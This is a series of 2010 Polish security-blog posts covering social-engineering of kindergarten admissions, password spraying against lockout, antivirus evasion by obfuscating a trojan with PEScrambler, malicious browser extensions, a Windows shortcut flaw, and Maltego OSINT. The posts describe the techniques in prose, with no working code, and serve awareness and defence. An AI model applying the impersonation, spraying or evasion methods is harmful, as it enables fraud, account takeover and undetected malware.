HARD CORE SECURITY LAB

Socjotechniczne ataki na... szkolne procesy rekrutacyjne

2010-07-22T11:08:00.001+02:00

Od pewnego czasu polskie przedszkola znów pękają w szwach, a rodzice zaciekle walczą o każde wolne miejsce. Jak to zwykle w naszym pięknym kraju bywa, znów ktoś czegoś odpowiednio nie zaplanował, nie tym jednak będziemy się dziś zajmować. Otóż okazuje się, że przebiegli rodzice mogą za pomocą prostych ataków socjotechnicznych wyeliminować część konkurencji startującej wraz z ich pociechą w wyścigu o upragnione przedszkolne miejsca. Poniższe przykłady nie mają jednak zachęcać do podobnych praktyk, a raczej zwracać uwagę na kilka potencjalnych zagrożeń.

Spójrzmy najpierw na przykład pewnej Brytyjki, która chcąc zapewnić swemu dziecku miejsce w prestiżowej londyńskiej szkole podstawowej, posunęła się do podstępu godnego samego mistrza Mitnicka.

Sprytna mama założyła odpowiednie konto w usłudze Gmail i podszyła się pod rodzica jednego z dzieci, które znajdowało się na liście rekrutacyjnej wyżej od jej własnej pociechy. W wiadomości e-mail skierowanej do władz szkolnych, kobieta poprosiła po prostu o wykreślenie konkurencyjnego dziecka z listy, a prośba ta została spełniona! E-mail zawierał dane personalne dziecka (w tym dokładną datę urodzenia), co najwyraźniej szkoła uznała za wystarczające potwierdzenie tożsamości rzekomego rodzica.

Spójrzmy teraz na nasze rodzime przedszkolne procesy rekrutacyjne. Jak się okazuje, przykładowo w Warszawie działa Elektroniczny system ewidencji podań do warszawskich przedszkoli. Proces rekrutacyjny na ten rok został już dawno zakończony i trudno obecnie poznać jego szczegóły, wygląda jednak na to, że zgłoszenie sprowadza się do wypełnienia odpowiedniego formularza online dostępnego w ramach Elektronicznego Systemu Ewidencji Podań. Możemy więc założyć, że po wszystkim otrzymamy jakiś mail z potwierdzeniem. Jeśli nawet w ten sposób nie poznamy adresu e-mailowego odpowiedniego do złożenia fałszywej rezygnacji w imieniu rodziców konkurencyjnego dziecka, to na głównej stronie dostępny jest następujący adres kontaktowy: przedszkola2009@edukacja.warszawa.pl.

Pytanie tylko, czy odpowiednio spreparowany e-mail pozwoliłby nieuczciwym rodzicom na wykreślenie z listy innego, dowolnie wybranego dziecka? Nikomu nie radzę jednak przeprowadzania tego typu prób (brytyjską mamą zajęła się już policja).

Przy coraz częściej stosowanych rekrutacjach elektronicznych, tego typu próby kradzieży tożsamości będą się pojawiać coraz częściej. W jaki więc sposób waszym zdaniem należy zabezpieczać tego typu przedsięwzięcia? Z jednej strony cała procedura nie może być zbyt skomplikowana, z drugiej jednak nie może być tak, że podanie kilku danych personalnych oraz skorzystanie z odpowiednio sugestywnego adresu e-mailowego pozwoli każdemu na skuteczne podszycie się pod innych uczestników rekrutacji...

[źródło]

Nieskomplikowane i jednocześnie bezpieczne hasła? To jednak możliwe!

2010-07-21T15:02:00.002+02:00

Hasło powinno być długie i składać się przynajmniej z 14 znaków. Ponadto, musi zawierać litery (najlepiej małe oraz wielkie), cyfry oraz symbole. Idealne hasło nie powinno się z niczym kojarzyć oraz nie powinno składać się ze słów lub fraz występujących w słownikach. Poza tym, do każdego zastosowania powinniśmy użyć innego, silnego hasła. To już nie tylko zalecenia, nowoczesne systemy informatyczne oraz serwisy internetowe zaczynają na nas wymuszać stosowanie coraz bardziej skomplikowanych fraz, okazuje się jednak, że badacze z firmy Microsoft chcą zupełnie zrewolucjonizować ten najpopularniejszy sposób uwierzytelniania.

Wymóg stosowania bardzo silnych haseł ma nas uchronić przed atakami siłowymi (ang. brute force) oraz słownikowymi, należy jednak pamiętać, że użytkownicy bardzo często w takich przypadkach po prostu zapisują gdzieś (np. na kartce papieru, w pliku tekstowym lub po prostu w przeglądarce) trudne do zapamiętania hasła. Jeśli nie chcemy zapisywać naszych haseł w postaci jawnej, jedynym rozwiązaniem może się okazać opracowanie jakiegoś własnego systemu generowania bezpiecznych haseł.

Bardzo często też, zamiast wprowadzać wyjątkowo restrykcyjne wymogi złożoności haseł, stosuje się mechanizmy czasowo blokujące (ang. lock-out) konto użytkownika po kilku nieudanych próbach logowania. Czy takie zabezpieczenie jest skuteczne? Może być skuteczne w przypadku ataku wymierzonego w konkretnego użytkownika, jeśli jednak intruz poszukuje dowolnych poświadczeń pozwalających na zalogowanie się do usługi, wystarczy tylko, że wykorzystany zostanie prosty trik.

Otóż nie jest tajemnicą, że użytkownicy komputerów pewne hasła stosują częściej od innych fraz. W efekcie możliwe jest utworzenie pewnego słownika kilku haseł najczęściej stosowanych. Teraz wystarczy już tylko uruchomić masową próbę logowania, jednak algorytm siłowy lub słownikowy utworzyć tak, by zmieniały się loginy i dla każdej sprawdzanej nazwy użytkownika wystarczy tylko wykonać próbę logowania z ustalonymi wcześniej kilkoma hasłami najpopularniejszymi. W efekcie mechanizm blokowania kont nie zablokuje intruza (próba logowania na każde z kont odbywa się tylko kilka razy), natomiast potencjalnie uda się ustalić wiele poprawnych poświadczeń.

Skoro więc wiemy już, że wymuszanie silnych haseł ma swe wady (często powoduje zapisywanie haseł w rozmaitej postaci), a blokadę lock-out można obejść za pomocą ataku sprawdzającego tylko kilku najpopularniejszych haseł dla wielu różnych kont, to cóż nam pozostaje w walce z komputerowymi przestępcami? Okazuje się, że rozwiązaniem mogą się okazać hasła nieskomplikowane, jednak bezpieczne ze względu na pewną dodatkową cechę systemu informatycznego.

Wyobraźmy sobie duży serwis internetowy (np. Gmail lub Hotmail), który nie narzuca absolutnie żadnych wymogów co do postaci oraz złożoności haseł swych użytkowników. W zamian jest jednak wymóg taki, że dane hasło nie zostanie przyjęte, jeśli jest już zbyt popularne pośród dotychczasowych użytkowników. Jeśli więc np. pięciu użytkowników stosuje już hasło asdfqwer, to szósty chętny na tę frazę będzie musiał już wymyślić coś innego. W połączeniu z klasycznym mechanizmem blokady lock-out chroniącym pojedyncze konto przed siłowymi oraz słownikowymi atakami, takie podejście uniemożliwia wykonanie ataku z wykorzystaniem kilku bardzo popularnych haseł, ponieważ takich haseł po prostu w takim systemie nie będzie...

Mimo, że intruz może założyć, że niemal na pewno pośród kilku milionów użytkowników występuje kilka haseł asdfqwer, to jednak wiedząc, że jest ich co najwyżej 5, atak online sprawdzający wszystkie kombinacje loginów z taką właśnie frazą nie daje dużej nadziei na sukces. Natomiast w klasycznym systemie informatycznym, pośród kilku milionów użytkowników można się spodziewać, że ilość haseł typu asdfqwer może wynieść setki lub nawet tysiące wystąpień, co pozwala już na przeprowadzenie ataku na różne konta sprawdzając właśnie tę frazę jako potencjalne hasło.

Powyższy pomysł badaczy jest moim zdaniem bardzo obiecujący i unikatowy. Można powiedzieć, że zastosowanie takiej metody podnosi bezpieczeństwo systemu, ale również zwiększa komfort użytkowników (brak absurdalnych wymogów dotyczących złożoności haseł), co jest połączeniem naprawdę niecodziennym. Ograniczeniem jest jednak z pewnością to, że powyższa metoda sprawdzi się wyłącznie w największych serwisach internetowych z milionami aktywnych użytkowników. Ciekawe więc, czy metoda to kiedykolwiek zostanie w praktyce zastosowana? Warto również pamiętać, że żadne hasło oraz mechanizm wbudowany w centralny system informatycznych nie uchroni nas przed atakiem phishingowym lub też keyloggerem obecnym w naszym systemie.

[źródło]

Szkolenie z testów penetracyjnych systemów IT (rabat 200 zł)

2010-07-21T09:38:00.002+02:00

Wszystkie osoby zainteresowane zagadnieniami związanymi z testami penetracyjnymi systemów informatycznych, zapraszam na organizowane przez firmę Securitum szkolenie autorskie. Świetny dobór tematów, nacisk na praktyczne umiejętności oraz spora dawka przydatnej wiedzy teoretycznej, wszystko to stanowi o unikalności szkolenia Testy penetracyjne systemów IT. W dodatku, czytelnicy HARD CORE SECURITY LAB mogą liczyć na atrakcyjne rabaty!

Uczestnicy warsztatów odbywających się pod patronatem HARD CORE SECURITY LAB od 6 do 9 grudnia 2010 roku będą mieli między innymi możliwość:

zaplanowania testu penetracyjnego,
wykonania testu penetracyjnego,
przygotowania szczegółowego raportu,
zapoznania się ze sposobami skanowania (prostego i zaawansowanego),
używania fuzzera w sieci,
tworzenia skryptów fuzzingowych w Pythonie,
analizowania wyników fuzzingu,
testowania podatności na ataki typu buffer overflow,
modyfikowania działania przykładowej aplikacji (gdb, deasemblacja, modyfikacja stosu),
ominięcia mechanizmu uwierzytelniania w przykładowej aplikacji,
przeprowadzenia analizy exploita,
zapoznania się z wybranymi narzędziami pomagającymi w testach penetracyjnych.

Grupa docelowa szkolenia:

osoby odpowiedzialne za testowanie bezpieczeństwa w firmie,
administratorzy sieci i systemów,
programiści,
pracownicy departamentów bezpieczeństwa,
osoby zainteresowane bezpieczeństwem sieciowym,
osoby odpowiedzialne za monitoring bezpieczeństwa w firmie,
osoby techniczne odpowiedzialny za rekomendacje wyboru ochrony systemów IT w przedsiębiorstwie.

W trakcie szkolenia omówione zostaną metodologie i dokumentacje::

OSSTMM (Open Source Security Testing Methodology Manual),
ISSAF (Information Systems Security Assessment Framework),
dokumentacja/benchmark CIS (Center for Internet Security),
dokumentacja NIST,
OWASP Testing Guide (metodologia szczegółowa).

Więcej informacji i formularz zgłoszeniowy można znaleźć na stronach szkolenia.

Na koniec przypomnę tylko raz jeszcze, że na wszystkich czytelników HCSL czekają kupony rabatowe. Wszystkie osoby (prywatne), które powołają się na serwis HARD CORE SECURITY LAB, mogą liczyć na zniżkę w wysokości 200 zł. Biorąc pod uwagę to, że tego typu praktyczne szkolenia są w Polsce prawdziwą rzadkością, zachęcam wszystkich zainteresowanych do skorzystania z okazji do pogłębienia swej wiedzy w zakresie bezpieczeństwa sieci komputerowych.

Jeszcze raz o tym, jak w banalny sposób można oszukać antywirusa

2010-07-19T16:11:00.003+02:00

Wbrew temu, do czego chcą nas codziennie przekonać producenci rozwiązań antywirusowych, tego typu programy nie są w stu procentach skuteczne i nie oferują nam pełnej i bezproblemowej ochrony przed wszystkimi zagrożeniami. Pomijając już tak oczywiste fakty jak to, że antywirusy wymagają ciągłych aktualizacji, zużywają cenne zasoby systemowe, a czasem nawet powodują unieruchomienie całego systemu operacyjnego w wyniku fałszywych wykryć, dużym zaskoczeniem może być dla wielu osób to, w jak banalny sposób możliwe jest oszukanie nawet najbardziej renomowanych antywirusów. Spójrzmy na kolejny dowód.

Swego czasu pokazywałem już na łamach HCSL, że popularne antywirusy może zmylić nawet tak prosta czynność, jak podmiana ikony programu. Wtedy pojawiły się jednak m.in. głosy, że eksperyment przeprowadziłem na potencjalnie niebezpiecznym programie narzędziowym (fgdump), a nie na typowym złośliwym oprogramowaniu, co wg niektórych czytelników podważało wiarygodność całego testu.

Tym razem spójrzmy więc na typowy malware. Do testu wybrałem rodzimego trojana o wdzięcznej nazwie Świnia 1.0. Okazuje się, że wyrośnięty Prosiak jest już całkiem dobrze znany antywirusom. Dzięki świetnej usłudze Virustotal mamy dostęp do automatycznego skanera wyposażonego w 41 najpopularniejszych silników antywirusowych, sprawdźmy więc Świnię w pierwotnej postaci (tutaj dostępne są wynik skanowania):

Jak mogliśmy się przekonać, całkiem sporo (28/42) antywirusów rozpoznaje naszego trojana, do tego poprawnie rozpoznając typ zagrożenia.

Sprawdźmy teraz, czy współczesne antywirusy dadzą się nabrać na stosunkowo prostą sztuczkę. Binarny kod programu poddamy obfuskacji, za pomocą narzędzia PEScrambler. Zaciemnianie kodu wykonywalnego ma zazwyczaj na celu utrudnienie lub wręcz uniemożliwienie skutecznego przeprowadzenia inżynierii wstecznej. PEScrambler jest właśnie bardzo skutecznym i nowatorskim obfuskatorem tego typu (więcej na jego temat można się dowiedzieć z prezentacji dostępnej tutaj), jak się jednak okazuje, tego typu narzędzia nadają się również świetnie jako anty-antywirusy...

Przepuśćmy więc nasz testowy malware przez PEScramblera:

Spróbujmy teraz przeskanować tak powstały plik wykonywalny za pomocą usługi Virustotal (tutaj dostępne są wynik skanowania):

Okazuje się więc, że po zastosowaniu zaledwie jednego narzędzia (choć oczywiście proces wykonany przez PEScrambler w żadnym razie nie jest banalny) przekształcającego postać kodu binarnego, już tylko 8 antywirusów było w stanie wykryć zagrożenie! Produkty wielu renomowanych producentów nie zdołały rozpoznać przebranej Świni...

Ten prosty eksperyment po raz kolejny obnaża niedoskonałości współczesnej generacji antywirusów. Mimo, że funkcjonalność kodu wykonywalny zawartego w pliku nie uległa żadnej zmianie, to wiele programów zabezpieczających nie zdołało wykryć zagrożenia. Z pewnością wynika to ze słabości rozmaitych sygnaturowych oraz opartych o proste sumy kontrolne metod detekcyjnych. Co prawda czołowi producenci chwalą się, że ich programy posiadają również inne zaawansowane metody rozpoznawania zagrożeń, widzimy jednak wyraźnie, że ich skuteczność pozostawia wiele do życzenia.

Podsumowując, nie możemy do końca ufać współczesnej generacji programów antywirusowych, gdyż wciąż ich skuteczność w wielu przypadkach rozczarowuje. Niestety nic jednak nie zapowiada w najbliższym czasie znaczącej poprawy w tym zakresie. Osobiście nie uważam, by kiedykolwiek programy ochronne były w stanie zapewnić nam stuprocentowe bezpieczeństwo. Coraz bardziej skłaniam się ku tezie, że przyszłością bezpieczeństwa będą nowe (projektowane od podstaw z myślą o bezpieczeństwie) architektury systemów operacyjnych, a nie programowe pakiety ochronne.

Kolejne niebezpieczne dodatki do Firefoksa

2010-07-15T13:21:00.002+02:00

Okazuje się, że niestety coraz częściej mamy do czynienia ze złośliwymi dodatkami i rozszerzeniami do popularnych przeglądarek internetowych. Kilka miesięcy temu dość głośno zrobiło się o dwóch zainfekowanych dodatkach do Firefoksa. Kilka dni temu prezentowałem zaś przykładowe rozszerzenie do Google Chrome, zdolne do potajemnego wykradania haseł internautów. Tymczasem Mozilla znów ostrzegła użytkowników swej przeglądarki przed kolejnymi oficjalnie dystrybuowanymi dodatkami.

Zgodnie z ostrzeżeniem opublikowanym przez Mozillę, dodatek Mozilla Sniffer, który od 6. czerwca był dostępny w ramach oficjalnej witryny Dodatki dla Firefoksa, wykradał poświadczenia internautów i przekazywał je na zdalny serwer. W chwili obecnej dodatek ten nie jest już dystrybuowany, a internauci którzy zdążyli go już pobrać (około 1800 pobrań) i zainstalować, zostaną automatycznie powiadomieni o zagrożeniu.

Niestety, może się okazać, że samo odinstalowanie dodatku to dopiero początek. Hasła i tak mogą się już znajdować w rękach komputerowych przestępców, musimy więc również zmienić wszelkie dane logowania, z których korzystaliśmy w trakcie obecności Mozilla Sniffera. Jest to więc kolejny przypadek, gdy złośliwy dodatek swobodnie prześlizguje się przez automatyczne mechanizmy kontrolne Mozilli. Jako, że dodatek znajdował się w fazie eksperymentalnej (co wiązało się z odpowiednim ostrzeżeniem przy próbie jego instalacji), nie wykonano inspekcji jego kodu.

Ponadto, w bardzo popularnym dodatku CoolPreviews w wersji 3.0.1 oraz starszych, odkryta została poważna luka pozwalająca na wykonanie złośliwego kodu za pomocą specjalnie spreparowanego odnośnika. Sprawa jest poważna, ze względu na ogromną ilość aktywnych użytkowników (177 tys.) oraz publiczną dostępność kodu PoC. Wersje dodatku podatne na atak mają również trafić na listę dodatków zablokowanych, a użytkownicy powinni skorzystać z nowej wersji CoolPreviews.

Jak już wielokrotnie wspominałem, znane nam obecnie mechanizmy rozszerzania funkcjonalności przeglądarek stanowią spore realne zagrożenia dla bezpieczeństwa naszego systemu informatycznego oraz danych. Popularność dodatków oraz brak naprawdę skutecznych mechanizmów kontroli kodu przed jego upublicznieniem, zostały już dawno zauważone przez komputerowych przestępców i będą przez nich coraz częściej wykorzystywane. Wygląda więc na to, że bez stworzenie skutecznych mechanizmów detekcyjnych (prawdopodobnie nie obędzie się bez manualnej inspekcji), które skutecznie nie pozwolą złośliwym dodatkom na przedostawanie się do oficjalnych kanałów dystrybucyjnych, coraz częściej będziemy świadkami powstawania złośliwego oprogramowania, które można określić mianem... addware.

[źródło]

Pojawił się malware wykorzystujący nieznaną lukę w Windows 7

2010-07-15T09:33:00.002+02:00

Całkiem niedawno przypomnieliśmy sobie ciekawą lukę pozwalającą na zaburzenie pracy systemu Windows XP za pomocą specjalnie spreparowanych skrótów. Jak się okazało, mimo swego zaawansowanego wieku, podatność ta nigdy nie została przez Microsoft załatana, tymczasem pojawiły się informacje na temat nieznanej do tej pory podatność w systemie Windows 7, która również dotyczy mechanizmu obsługi skrótów. Co najgorsze, najnowsza luka jest już w praktyce wykorzystywana przez komputerowych przestępców do infekowania popularnej Siódemki.

Eksperci z firmy VirusBlokAda odkryli niedawno malware zdolny do zainfekowania w pełni załatanego systemu Windows 7. Jak się okazało, aby paść ofiarą ataku, wystarczy tylko... wyświetlić zawartość znajdującą się na zainfekowanej pamięci USB za pomocą chociażby systemowego Eksploratora.

Malware rozprzestrzeniający się za pomocą pamięci USB jest bardzo popularny, do tej pory jednak zazwyczaj tego typu infekcje odbywały się z wykorzystaniem funkcji Autorun lub Autoplay. Tym razem do wykonania złośliwego kodu wykorzystywana jest nieznana do tej pory luka w mechanizmie obsługi skrótów. Okazuje się, że specjalnie przygotowane pliki .lnk mogą spowodować wykonanie programu już przy samym wyświetleniu zawartości katalogu, w którym same się znajdują.

W przypadku analizowanym przez firmę VirusBlokAda, złośliwe skróty powodowały zainstalowanie rootkita, poprzez instalację dwóch sterowników, które na chwile obecną nie są rozpoznawane jako zagrożenie przez większość programów antywirusowych:

Co najciekawsze, oba pliki zostały podpisane za pomocą certyfikatu firmy Realtek Semiconductor:

Charakterystyka nowej luki co prawda nie pozwala na wykorzystanie jej do masowego infekowania użytkowników Siódemki, jednak podatność ta wydaje się być stworzona do przeprowadzania ataków skierowanych na konkretny cel. Wystarczy sobie tylko wyobrazić pracownika pewnej firmy podrzucającego w formie materiałów promocyjnych zainfekowane pamięci USB pracownikom innych firm. Zainstalowany w ten sposób trojan lub inny malware może potencjalnie pozwalać na zdobycie wielu poufnych informacji.

Warto więc pamiętać, że podłączanie pamięci USB niewiadomego pochodzenia do własnego lub firmowego komputera nigdy nie jest dobrym pomysłem. Pomimo w pełni zaktualizowanego systemu oraz aktualnego programu antywirusowego, może w ten sposób dojść do infekcji! Niestety, nadal nie istnieją metody zdolne do zapewnienia nam pełnego bezpieczeństwa w obliczu ataków wykorzystujących nieznane do tej pory luki.

[źródło]

Zagrożenia związane z zakupami online [infografika]

2010-07-14T14:58:00.001+02:00

Wielu internautów nie wyobraża już sobie życia bez internetowych zakupów. W ten sposób oszczędzamy czas, ale i bardzo często również spore sumy pieniędzy. Duża część osób, szczególnie tych ze starszego pokolenia, boi się tego typu transakcji, wskazując na związane z nimi zagrożenia. Okazuje się, że w dużej mierze osoby te mają rację, gdyż globalny internetowy bazar jest trapiony przez oszustów, złodziei i komputerowych przestępców. Kradzieże numerów kart kredytowych, oszustwa oraz kradzieże tożsamości nieustannie towarzyszą internetowemu biznesowi. W celu uświadomienia sobie tego, jak ogromna jest skala tych zjawisk, warto zapoznać się z poniższą, bardzo interesującą infografiką.

Co ciekawe, pieniądze zarabiane na tego typu nielegalnym procederze są przede wszystkim wydawane na... elektroniczne gadżety!

Mimo, że rozmaite programy ochrony konsumentów zabezpieczają nas zazwyczaj przed koniecznością pokrycia strat powstałych w wyniku tego typu oszustw, to jednak nie łudźmy się, ostatecznie sumaryczne koszty i tak są pokrywane przez wszystkich klientów danej instytucji. Można więc powiedzieć, że edukowanie mniej świadomych internautów leży w interesie nas wszystkich!

[źródło]

Sprzętowy generator niebieskich ekranów śmierci

2010-07-14T09:22:00.002+02:00

Blue Screen of Death (BSoD, ang. Niebieski ekran śmierci), czyli bardzo charakterystyczny objaw poważnego błędu systemu operacyjnego z rodziny Microsoft Windows, znają niemal wszyscy użytkownicy komputerów na świecie i to nie tylko miłośnicy systemów operacyjnych rodem z amerykańskiego Redmond. BSoD jest bardzo często obiektem rozmaitych żartów i kpin, co ciekawe nawet sam Microsoft udostępnia żartobliwy programowy symulator krytycznej awarii. Dziś natomiast chciałbym przedstawić... sprzętowy generator charakterystycznych niebieskich ekranów.

BSODomizer to mały elektroniczny gadżet stworzony z myślą o płataniu figli użytkownikom komputerów. Wystarczy tylko wpiąć to zdalnie sterowane urządzenie pomiędzy komputer a monitor, a natychmiast uzyskamy możliwość generowania niebieskich ekranów śmierci. Tryb wyświetlania BSoD możemy wywołać w dowolnie wybranym momencie lub też możemy skorzystać z trybu losowego zakłócania pracy. Jeśli tylko użytkownik uruchomi ponownie komputer, to BSODomizer automatycznie powróci do trybu zwykłego przekazywania obrazu. Zobaczmy jak to wszystko wygląda w praktyce:

Co najciekawsze, wiedza potrzebna do zbudowania własnego egzemplarza BSODomizera jest w pełni darmowa i otwarta. Mamy więc do dyspozycji:

BSODomizer z pewnością jest gadżetem pozwalającym na robienie świetnych żartów. Wystarczy tylko wyobrazić sobie minę oddanego użytkownika Linuksa widzącego na swym monitorze charakterystyczne niebieskie tło! Cóż to jednak wszystko ma wspólnego z bezpieczeństwem? Otóż BSODomizer stanowi świetną okazją ku temu, by przypomnieć sobie, że potencjalny intruz uzyskujący fizyczny dostęp do naszego komputera lub systemu informatycznego jest w stanie praktycznie w dowolny sposób zmodyfikować lub zaburzyć jego pracę. Musimy więc zawsze uwzględniać bezpieczeństwo fizyczne, jako niezbędny fundament całego systemu bezpieczeństwa.

[źródło]

Rozszerzenia do Google Chrome mogą wykradać hasła

2010-07-13T11:21:00.003+02:00

Osobiście korzystam ze wszelkiego rodzaju rozszerzeń i dodatków do przeglądarek internetowych z dużym umiarem. Po pierwsze wolę samodzielne, specjalizowane narzędzia. Po drugie, znane nam obecnie mechanizmy rozszerzania funkcjonalności przeglądarek stanowią potencjalnie spore zagrożenia dla bezpieczeństwa naszego systemu informatycznego oraz danych. Google Chrome oficjalnego wsparcia dla rozszerzeń doczekał się całkiem niedawno, warto jednak wiedzieć, że powstało już rozszerzenie zdolne od wykradania naszych poświadczeń.

Oficjalne wsparcie dla rozszerzeń, pojawiło się w Google Chrome w wersji 4.1.249. Rozszerzenia są tworzone za pomocą technologii JavaScript oraz HTML i m.in. pozwalają na dostęp do formularzy znajdujących się na witrynach internetowych, również tych służących do... wprowadzania poświadczeń.

Andreas Grech postanowił przygotować przykładowe rozszerzenie demonstrujące właśnie tego typu zagrożenie. Otóż działanie rozszerzenia jest bardzo proste. Gdy tylko użytkownik wpisuje swe poświadczenia na jakiejś stronie internetowej, login oraz hasło zostają przechwycone oraz przesłane e-mailem do potencjalnego intruza. Z punktu widzenia internauty cały atak jest jednak zupełnie niewidoczny i nie zaburza samego procesu logowania.

Przygotowany przez Andreasa kod PoC ma następującą postać:

Tutaj natomiast jest dostępny plik manifest.json.

Mimo, że zaprezentowany przez Grecha przykład praktyczny jest bardzo interesujący i przypomina nam wszystkim o zagrożeniach związanych z tak popularnymi dziś dodatkami i rozszerzeniami do przeglądarek internetowych, to jednak pomysł na ataki z wykorzystaniem rozszerzeń nie jest nowy. Warto chociażby wspomnieć, że całkiem niedawno dystrybuowane były zainfekowane dodatki do Firefoksa, które to przedostały się przez rutynowe mechanizmy kontrolne Mozilli.

Reasumując, wszyscy (twórcy przeglądarek, komputerowi przestępcy oraz internauci) na dzień dzisiejszy zdają sobie sprawę z zagrożeń, jakie niosą ze sobą dodatki i rozszerzenia. Jednak ze względu na specyficzne cechy znanych nam dziś technologii doposażenia przeglądarek, wyeliminowanie tego typu zagrożeń w praktyce nie jest możliwe. Głównym wyzwaniem na chwilę obecną jest więc stworzenie takich mechanizmów detekcyjnych, które nie pozwolą złośliwym dodatkom na przedostanie się do oficjalnych kanałów dystrybucyjnych.

[źródło]

Otwartoźródłowy skrypt do wykrywania mobilnych przeglądarek

2010-07-12T13:54:00.003+02:00

Detect Mobile Browser to otwarty projekt mający na celu rozwijanie metod pozwalających na wykrywanie użytkowników witryn internetowych korzystających z rozmaitych urządzeń mobilnych. Metoda detekcyjna opiera się oczywiście na odpowiedniej analizie User agenta i może się okazać bardzo przydatna twórcom witryn mających w jakiś szczególny sposób obsługiwać internautów korzystających z mobilnych przeglądarek, czy jednak tego typu skrypty nie przydadzą się również komputerowym przestępcom?

Projekt Detect Mobile Browser to w zasadzie zbiór otwartoźródłowych skryptów przygotowanych w kilku najpopularniejszych technologiach, zdolnych do wykrycia wielu różnych mobilnych przeglądarek internetowych. Wszystko opiera się na odpowiednim wyrażeniu regularnym:

Nasuwa się jednak pytanie, czy technologia wykrywania mobilnych przeglądarek może zostać również wykorzystana przez komputerowych przestępców? Wygląda na to, że niestety tak. Otóż udany atak internetowy (np. za pomocą witryny zawierającej złośliwy kod) polega na dostarczeniu kodu odpowiedniego dla docelowego systemu, gdyż przykładowo exploit przeznaczony dla Internet Explorera raczej nie zaszkodzi użytkownikowi Firefoksa, czy też Opery.

Z punktu widzenia twórcy złośliwej witryny internetowej najkorzystniejsze jest więc dokładne rozpoznanie oprogramowania używanego przez internautę do surfowania, a następnie zaaplikowanie wybranego na tej podstawie złośliwego kodu. Wraz z upowszechnianiem się urządzeń mobilnych, skuteczne rozpoznawanie mobilnych przeglądarek będzie więc miało dla komputerowych przestępców coraz większe znaczenie, a skrypty publikowane w ramach projektów takich jak Detect Mobile Browser, będę z pewnością wykorzystywane w ramach... nowych generacji exploit packów.

[źródło]

Maltego 3: nowa wersja doskonałego narzędzia do OSINT

2010-07-12T11:21:00.005+02:00

Biały wywiad (ang. Open Source INTelligence) to forma zdobywania wszelkich dostępnych informacji o interesującym nas obiekcie, pochodzących jednak wyłącznie z ogólnodostępnych źródeł (Internet, prasa, itp.). To że źródła są dostępne dla każdego nie oznaczy jednak, że każdy może i potrafi z nich skorzystać! Dlatego też skuteczny OSINT nie jest sztuką łatwą. Z pomocą mogą nam jednak przyjść narzędzia stworzone specjalnie z myślą o białym wywiadzie, a wśród nich warto wyróżnić program Maltego, który właśnie został udostępniony w wersji 3.

Ręczne wyszukiwanie w Internecie wszystkich informacji dostępnych na temat jakiegoś obiektu, może być nużące, łatwo również przegapić jakieś istotne informacje. Problemem jest również odpowiednie powiązanie danych dostępnych w rozmaitych niezależnych systemach informatycznych oraz serwisach internetowych, które najczęściej nie są przecież ze sobą w jakikolwiek sposób połączone.

Istnieją jednak narzędzia automatyzujące proces zbierania i kojarzenia informacji wywiadowczych pochodzących z globalnej sieci. Maltego, bo właśnie to niesamowite narzędzie chciałbym dziś przedstawić, jest jednym z najciekawszych z nich. Już po chwili obcowania z aplikacją trudno się nie zgodzić ze sloganem (Information is power. Information is Maltego), którym producent reklamuje swój produkt. Maltego potrafi w formie graficznej zagregować niemal wszelkie informacje dostępne w Internecie na zadany temat. Brzmi nieprawdopodobnie, ale tak właśnie działa ten program. Maltego, wykorzystując zaawansowane algorytmy, jest więc w stanie ustalić związki i zależności panujące pomiędzy następującymi bytami:

osobami,
społecznościami,
przedsiębiorstwami i organizacjami,
serwisami internetowymi,
domenami internetowymi,
zakresami adresów IP,
adresami poczty elektronicznej,
numerami telefonów,
frazami,
dokumentami i innymi zbiorami informacji.

Chcąc przekonać się o faktycznych możliwościach Maltego, wystarczy spojrzeć na przykładowy schemat powiązań wygenerowany dla jednej z domen skojarzonych z serwisem HCSL:

Na podstawie samej tylko nazwy domeny, program ustalił naprawdę sporo informacji, między innymi:

moje dane personalne,
mój adres e-mail,
inne domeny, serwisy oraz serwery w jakiś sposób skojarzone z serwisem HCSL.

Przeprowadzone przeze mnie testy pokazują, że Maltego może nam pomóc w zgromadzeniu wielu interesujących informacji. Możliwe może się okazać przykładowo odnalezienie numeru telefonu należącego do właściciela podanego adresu e-mail, czy też odnalezienie danych personalnych osoby ukrywającej się pod określonym loginem w jednym z serwisów internetowych. Warto również zauważyć, że Maltego może się okazać pomocne przy próbie oszacowania ilości newralgicznych informacji krążących w Internecie na nasz temat.

Jak widać Maltego jest niezastąpionym narzędziem automatyzującym biały wywiad. Program ten jest dostępny w darmowej wersji z pewnymi drobnymi ograniczeniami (Community Edition) zarówno pod systemy z rodziny Linux, jak i Windows. Wersja komercyjna, pozbawiona jakichkolwiek ograniczeń, to już jednak wydatek w wysokości 650 USD (roczna licencja).

Czy potrafisz złamać kod US Cyber Command?

2010-07-10T11:39:00.002+02:00

Stany Zjednoczone Ameryki mają już swoje wojskowe odziały specjalnie stworzone z myślą o prowadzeniu cyberwojny. United States Cyber Command to specjalna komórka amerykańskiej armii przystosowana do prowadzenia walki na polu najnowszych technologii teleinformatycznych. USCYBERCOM rozpoczął swą działalność 21 maja i od samego początku rekrutuje przede wszystkim specjalistów z zakresu obrony systemów teleinformatycznych, nie jest jednak tajemnicą, że do pracy na rzecz amerykańskiego rządu poszukiwane są również osoby obdarzone unikalnymi umiejętnościami w zakresie naruszania bezpieczeństwa. Gdy przyjrzymy się dokładniej emblematowi tej jednostki, okazuje się, że skrywa on interesującą zagadkę.

Misja jednostki USCYBERCOM została określona w następujących słowach:

USCYBERCOM plans, coordinates, integrates, synchronizes and conducts activities to: direct the operations and defense of specified Department of Defense information networks and; prepare to, and when directed, conduct full spectrum military cyberspace operations in order to enable actions in all domains, ensure US/Allied freedom of action in cyberspace and deny the same to our adversaries.

Spójrzmy teraz dokładnie na wspomniany emblemat:

Spostrzegawcze osoby z pewnością zauważyły interesujący ciąg znaków:

9ec4c12949a4f31474f299058ce2b22a

Cóż ten ciąg znaków oznacza? Czy jesteście w stanie rozszyfrować tę intrygującą zagadkę? Pomimo, że w Internecie można już odnaleźć poprawne rozwiązanie, zachęcam wszystkich do samodzielnego główkowania.

Na koniec warto zauważyć, że tworzenie jednostek takich jak United States Cyber Command jest z pewnością dobrym pomysłem, jednak ich działanie musi się przecież opierać m.in. na bardzo aktywnym monitorowaniu działania wszelkich systemów teleinformatycznych. Pytanie więc, jak daleko tego typu formacje posuną się w inwigilowaniu własnych obywateli, w celu... ochrony najważniejszych rządowych systemów teleinformatycznych?

Proszę, by na chwilę obecną nie pojawiały się komentarze z rozwiązaniem zagadki, tak by osoby chcące nieco pogłówkować, nie natrafiły przypadkowo na podpowiedź.

Jak stworzyć swój własny exploit? [video]

